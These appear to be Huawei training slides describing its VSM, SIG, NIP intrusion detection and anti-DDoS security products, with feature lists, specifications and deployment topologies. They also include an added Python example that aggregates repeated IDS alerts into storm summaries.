Product positioning: Sold along with security products as a total solution for Chinese and overseas industrial customers; deployed with the U2000 component on the SP network.

Application scenarios: Unified management of switches, routers, and security products

TMN standard framework:
- Service management layer
- Network management layer
- Network element (NE) management layer

Communication modes: SNMP, SFTP, and SSH

Product features: C/S architecture, in-band or out-of-band networking, topology management, NE management, performance management, centralized policy configuration management, fault management, and VPN management for the full Eudemon/USG/SIG series of security devices and mainstream network devices; an intuitive network topology view helps administrators quickly locate network faults, improve management, increase work efficiency, and reduce maintenance cost, providing an efficient management platform for all devices on the network.

[Figure: VSM components: Console, Management server, Collection server.]

Functions of the VSM

Unified management platform for network and security devices:

NE management:
- Topology management
- Device management
- Board management
- Interface management
- Routing and switching devices

Performance management:
- Performance monitoring
- Real-time management
- Performance statistics

Fault management:
- Alarm browsing and statistics
- Alarm confirmation and synchronization
- Correlation rules
- Alarm screening
- Remote notification
- Alarm dumping

Policy configuration:
- Security policy
- Virtual firewall
- Anti-attack
- L2TP VPN policy
- IPSec VPN policy
- Single-point Web configuration

Northbound interfaces: SNMP, CORBA, FTP, XML, TEXT

Complete self-management capabilities of the system

VSM Deployment Topology

[Figure: VSM deployment topology. Labels: Enterprise headquarters; Security policy center (Secospace TSM, VSM); SSL VPN gateway; SACG; SIG; NIP intrusion detection; Switch; SSL/IPSec VPN; Intranet; TSM Agent; Data center; USG firewall; DMZ; Branch (IPSec VPN, USG firewall, Router); Internet; USG firewall; NIP intrusion detection; Partner (IPSec VPN); Mobile user (SSL/IPSec VPN).]

Contents

1. Huawei Security Products Overview
2. USG Series Products Overview
3. VPN Gateway Products Overview
4. Security Software Products Overview
5. SIG Products Overview
6. NIP Products Overview
7. Anti-DDoS Solution Overview

Service Inspection Gateway (SIG)

The SIG is delivered by Huawei to help customers add to and maintain the value of their MAN services. It provides functions such as service traffic flow analysis, VoIP service monitoring, P2P service monitoring, shared access monitoring, abnormal traffic (such as DDoS traffic) monitoring, user behavior analysis, and intelligent Web pushing.

Service awareness:
- Understanding traffic composition, distribution, and trend as a basis for network planning
- Monitoring network applications and exploring new service growth points

Flow control:
- Controlling P2P traffic to release bandwidth and reduce internetwork settlement cost
- Improving user experience in other applications such as Web page browsing, gaming, and stock trading

Illegitimate service control:
- Preventing illegitimate Internet connections by illegitimate Internet cafes and small enterprises, to help operators increase broadband service revenues
- Restricting illegitimate VoIP operation

Value-added service operation:
- Statistics of the websites users are most interested in, user classification by interest, and top N websites
- Interest- and instant-based intelligent advertisement pushing

DDoS attack monitoring to provide secure broadband networks

[Figure: SIG unified platform. Monitoring: traffic flow, P2P, DDoS, illegitimate VoIP, behavior analysis; Control; Web pushing; Security management.]

SIG9280E/1000E High-Integrity 10G Off-line DPI Device

Model                              | SIG1000E                                | SIG9280E
Appearance                         | Rackmount, 5U                           | Rackmount, 14U
Type of extended interface cards   | 10G POS, 10GE, 4 x 2.5G POS, 8 x GE     | 10G POS, 10GE, 4 x 2.5G POS, 8 x GE
Number of extended interface cards | 4                                       | 12
Extended service slots             | 4 x service board, 2 x switching board  | 12 x service board, 2 x switching board
Power supply                       | DC/AC; dual power supply                | DC/AC; dual power supply

SIG9280E highlights: key component redundancy (high availability); 12 x 10G access (high density); 12 x service boards (high flexibility); 2.5G/10G POS (high scalability).

Contents

1. Huawei Security Products Overview
2. USG Series Products Overview
3. VPN Gateway Products Overview
4. Security Software Products Overview
5. SIG Products Overview
6. NIP Products Overview
7. Anti-DDoS Solution Overview

Overview of the NIP Intrusion Detection System (IDS)

Product positioning: IDC and enterprises of all sizes

Application scenarios:
- 1000/100M intranet intrusion detection and behavior auditing
- IDC 1000/100M security defense intrusion detection

Key performance:
- NIP200: 200 Mbit/s throughput, 250,000 concurrent users
- NIP1000: 1 Gbit/s throughput, 1 million concurrent users

Hardware specifications:
- NIP200: 3 x GE electrical port
- NIP1000: 2 x GE electrical port + 2 x GE optical port

Product features:
- Special application-layer accelerating engine and efficient algorithm for high-speed, efficient, and accurate detection
- Special virtual engine technology to provide all-in-one functions at lower cost
- Professional security anti-attack labs to adapt to the latest network attack prevention technologies in the world and maintain technical edges

[Figure: NIP200 and NIP1000 appliances.]

Functions of the NIP IDS

Intrusion detection and analysis:
- Worm detection
- Protocol decoding
- IP fragment reassembly
- Log storm processing
- Protocol filtering and false positive processing

Security event response:
- Alarming
- Logging
- Session disconnection
- Program execution
- Firewall interworking

System activity and status monitoring:
- Engine status monitoring
- Server status monitoring
- Email and MSN monitoring
- File transfer and real-time session monitoring
- Harmful website monitoring
- Multi-port listening

Log management:
- Log query
- Log replication
- Log synchronization
- Log deletion
- Log compression

Statistics:
- Intrusion statistics
- Traffic statistics
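Log storm processing, listed above under intrusion detection and analysis, is the step that stops a burst of identical alerts (a worm probing one subnet, a scanner hitting one host) from flooding the console and the log store while still recording how large the burst was. The block below is an added example, not NIP code: the alert line format, signature names and addresses are constructed for this illustration and the window and threshold values are assumptions, not product defaults.

```python
"""Log storm processing in the spirit of the NIP IDS function listed above.

Added example, not NIP code.  Repeated alerts with the same (signature,
source, destination) inside a time window are collapsed into one summary
that carries the hit count; summaries whose count reaches a threshold are
flagged as storms so an operator sees the burst once, with its size.
The alert line format is constructed and is not a Huawei log format.
"""
import re
from collections import OrderedDict
from datetime import datetime, timedelta

TS_FMT = "%Y-%m-%d %H:%M:%S"
ALERT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) ALERT sig=(?P<sig>\S+) "
    r"src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+)$"
)

# Constructed sample: one worm-style burst (same signature and source,
# 6 hits in 10 seconds), a repeat of that tuple after the window expired,
# and two unrelated single alerts that must not be merged into it.
SAMPLE_ALERTS = """\
2010-05-01 12:00:00 ALERT sig=WORM.SMB.Probe src=10.1.1.20 dst=10.1.2.5 dport=445
2010-05-01 12:00:01 ALERT sig=WORM.SMB.Probe src=10.1.1.20 dst=10.1.2.5 dport=445
2010-05-01 12:00:02 ALERT sig=HTTP.Dir.Traversal src=198.51.100.9 dst=10.1.3.8 dport=80
2010-05-01 12:00:03 ALERT sig=WORM.SMB.Probe src=10.1.1.20 dst=10.1.2.5 dport=445
2010-05-01 12:00:05 ALERT sig=WORM.SMB.Probe src=10.1.1.20 dst=10.1.2.5 dport=445
2010-05-01 12:00:07 ALERT sig=WORM.SMB.Probe src=10.1.1.20 dst=10.1.2.5 dport=445
2010-05-01 12:00:09 ALERT sig=WORM.SMB.Probe src=10.1.1.20 dst=10.1.2.5 dport=445
2010-05-01 12:00:40 ALERT sig=WORM.SMB.Probe src=10.1.1.21 dst=10.1.2.5 dport=445
2010-05-01 12:02:00 ALERT sig=WORM.SMB.Probe src=10.1.1.20 dst=10.1.2.5 dport=445
"""


def aggregate_alerts(text, window=timedelta(seconds=60), storm_threshold=5):
    """Collapse repeated alerts into one summary per (sig, src, dst) per window.

    Each summary holds first/last timestamp, hit count and a 'storm' flag set
    when the count reaches storm_threshold.  Input is assumed to arrive in
    time order, as a live sensor feed does.
    """
    open_windows = OrderedDict()  # key -> summary still accumulating hits
    summaries = []

    def close(key):
        summaries.append(open_windows.pop(key))

    for line in text.splitlines():
        m = ALERT_RE.match(line)
        if not m:
            continue  # not an alert line
        ts = datetime.strptime(m["ts"], TS_FMT)
        key = (m["sig"], m["src"], m["dst"])
        cur = open_windows.get(key)
        if cur is not None and ts - cur["first"] >= window:
            close(key)  # window expired: emit it and start a fresh one
            cur = None
        if cur is None:
            cur = {"sig": key[0], "src": key[1], "dst": key[2],
                   "first": ts, "last": ts, "count": 0, "storm": False}
            open_windows[key] = cur
        cur["last"] = ts
        cur["count"] += 1
        cur["storm"] = cur["count"] >= storm_threshold
    for key in list(open_windows):
        close(key)  # flush whatever is still accumulating at end of input
    return summaries


def storms(summaries):
    """The summaries an operator should look at first."""
    return [s for s in summaries if s["storm"]]


if __name__ == "__main__":
    for s in aggregate_alerts(SAMPLE_ALERTS):
        print(s["sig"], s["src"], s["dst"], s["count"], "STORM" if s["storm"] else "")
```

Nine raw alerts become four summaries, one of them flagged as a storm with a count of six; the burst is not discarded, it is reported once with its size, which is what keeps the detection value while removing the flood.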

NIP IDS Deployment Topology

[Figure: NIP IDS deployment. Labels: Intranet; Switch; Firewall; Router; Internet; NIP engine; NIP console.]

Contents

1. Huawei Security Products Overview
2. USG Series Products Overview
3. VPN Gateway Products Overview
4. Security Software Products Overview
5. SIG Products Overview
6. NIP Products Overview
7. Anti-DDoS Solution Overview

Overview of the Anti-DDoS Solution

Solution positioning: Professional anti-DDoS solution

Application scenarios: DMZ service protection for customers in the following industries:
- Banks and securities
- Government (public security, HR, and statistics departments)
- Portal websites
- Other industries with DMZ services as the key services

Components:
- Detection center device and cleaning device: ADG 5320-I, ADG 5320-D
- Management center: VSM

[Figure: ADG 5320 appliance.]

Anti-DDoS Solution Deployment Topology

[Figure: Anti-DDoS solution deployment. Labels: Management center (Device management, Policy management, Reporting); Upper-level network; Network egress; Network access; Anti-DDoS solution: Detection center (professional traffic analysis device), Cleaning center (professional traffic cleaning device); Policy interworking; Control interworking.]

Summary

- USG series firewalls
- VPN gateway products
- Security software products
- SIG products
- NIP products
- Anti-DDoS solution

Questions

- What security products can Huawei deliver?
- What main software security products can Huawei provide?
- What are the characteristics or modes of Huawei security product deployment?
- What problems can Huawei security products resolve?

Thank you

www.huawei.com